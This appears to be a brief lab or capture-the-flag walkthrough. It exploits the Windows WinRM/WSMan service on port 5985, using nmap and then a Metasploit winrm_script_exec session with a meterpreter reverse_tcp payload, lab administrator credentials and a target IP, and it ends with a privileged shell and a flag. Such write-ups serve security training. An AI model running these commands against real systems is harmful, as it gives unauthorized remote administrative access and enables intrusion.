Hello readers! I hope you are well and safe, in this post you will learn to exploit a vulnerable windows service WinRM using Powershell.
WinRM service is used for PowerShell remoting and WSMan is a cmdlet in PowerShell to manage
WS-Management data on a local or remote computer. Read more about it from the following links to get a clear picture of what WSMan does.
You will see me exploiting
wsman service to gain the access to the target machine
nmap to find open ports and services
So wsman is served from
5985 port. Let's find out whether it has any exploit or not
Using the Metasploit module and the authentication creds provided in the lab
msf6 > use exploit/windows/winrm/winrm_script_exec [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(windows/winrm/winrm_script_exec) > set username administrator username => administrator msf6 exploit(windows/winrm/winrm_script_exec) > set password tinkerbell password => tinkerbell msf6 exploit(windows/winrm/winrm_script_exec) > set force_vbs true force_vbs => true msf6 exploit(windows/winrm/winrm_script_exec) > set rhosts 10.4.28.59 rhosts => 10.4.28.59 msf6 exploit(windows/winrm/winrm_script_exec) > run
Now wait for the stager to ship the meterpreter to the target system
You got your flag and a privileged session.